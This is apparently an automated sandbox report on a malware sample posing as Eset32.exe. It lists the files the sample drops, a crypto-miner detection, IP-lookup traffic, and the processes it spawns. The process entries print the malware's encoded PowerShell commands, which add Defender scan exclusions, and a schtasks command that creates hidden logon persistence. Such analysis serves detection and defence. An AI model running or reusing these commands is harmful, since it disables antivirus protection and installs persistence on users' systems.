Source: powershell.exe, 0000000A.00000002.514065308.0000021AAB7E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.624575236.0000024F8D59A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000003.622068168.0000024F8D59A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.679127744.000002BE88776000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000003.671831043.000002BE88776000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000001E.00000002.634745548.0000024FA5AC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708582880.0000000006C17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com4
Source: Eset32.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Eset32.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.digicert.com0N
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.entrust.net02
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 12.exe, 00000001.00000002.552111888.0000000003495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.501374621.0000021A936C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.624837713.0000024F8D681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.679354335.000002BE88901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.entrust.net/rpa0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.entrust.net/rpa03
Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.gnu.org/licenses/
Source: System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jsonrpc.org/
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/openwall/john/issues/3454#issuecomment-436899959
Source: powershell.exe, 0000000A.00000002.510560064.0000021A948A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511051451.0000021A94B38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511415597.0000021A94D18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: https://pidgin.im0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | DNS traffic detected: queries for: ip-api.com
Source: C:\Users\user\Desktop\Eset32.exe | Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C

            System Summary

Source: 1.exe.0.dr Static PE information: section name: .5{mr
            Source: Eset32.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
            Source: Process Memory Space: System.exe PID: 4512, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
            Source: C:\Users\user\Desktop\Eset32.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Eset32.exe Code function: 0_2_00406945
            Source: C:\Users\user\Desktop\Eset32.exe Code function: 0_2_0040711C
            Source: C:\Users\user\AppData\Roaming\12.exe Code function: 1_2_00007FF9F09BE5C2
            Source: C:\Users\user\AppData\Roaming\12.exe Code function: 1_2_00007FF9F09BD816
            Source: C:\Users\user\AppData\Roaming\12.exe Code function: 1_2_00007FF9F09B8574
            Source: C:\Users\user\AppData\Roaming\12.exe Code function: 1_2_00007FF9F09B0571
            Source: C:\Users\user\AppData\Roaming\12.exe Code function: 1_2_00007FF9F09B1599
            Source: C:\Users\user\AppData\Roaming\12.exe Code function: 1_2_00007FF9F09B1508
            Source: C:\Users\user\AppData\Roaming\12.exe Code function: 1_2_00007FF9F09B0515
            Source: C:\Users\user\AppData\Roaming\12.exe Code function: 1_2_00007FF9F09B2BC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C1464
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069CDEE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069CBF80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C1DA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C7D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C0B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069CC850
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C0868
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C155D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C20C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C1E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069CBC38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C7D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C0B31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_069C0B7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_09826E3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 6_2_09826E40
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF9F09B1958
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF9F09B19E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF9F09B2C68
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Code function: 22_2_00007FF9F09C0571
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Code function: 22_2_00007FF9F09C8574
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Code function: 22_2_00007FF9F09C1599
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Code function: 22_2_00007FF9F09C1508
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Code function: 22_2_00007FF9F09C0515
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Code function: 22_2_00007FF9F09C2BC9
Source: 12.exe.0.dr Static PE information: No import functions for PE file found
            Source: sihost64.exe.26.dr Static PE information: No import functions for PE file found
            Source: System.exe.1.dr Static PE information: No import functions for PE file found
            Source: Eset32.exe Virustotal: Detection: 63%
            Source: Eset32.exe Metadefender: Detection: 14%
            Source: Eset32.exe ReversingLabs: Detection: 59%
            Source: C:\Users\user\Desktop\Eset32.exe File read: C:\Users\user\Desktop\Eset32.exe
            Source: Eset32.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Eset32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Eset32.exe "C:\Users\user\Desktop\Eset32.exe"
            Source: C:\Users\user\Desktop\Eset32.exe Process created: C:\Users\user\AppData\Roaming\12.exe C:\Users\user\AppData\Roaming\12.exe
            Source: C:\Users\user\Desktop\Eset32.exe Process created: C:\Users\user\AppData\Roaming\1.exe C:\Users\user\AppData\Roaming\1.exe
            Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            Source: C:\Users\user\AppData\Roaming\12.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
            Source: C:\Users\user\AppData\Roaming\12.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
            Source: unknown Process created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\12.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Process created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
            Source: C:\Users\user\Desktop\Eset32.exe Process created: C:\Users\user\AppData\Roaming\12.exe C:\Users\user\AppData\Roaming\12.exe
            Source: C:\Users\user\Desktop\Eset32.exe Process created: C:\Users\user\AppData\Roaming\1.exe C:\Users\user\AppData\Roaming\1.exe
            Source: C:\Users\user\AppData\Roaming\12.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Users\user\AppData\Roaming\12.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\12.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Process created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
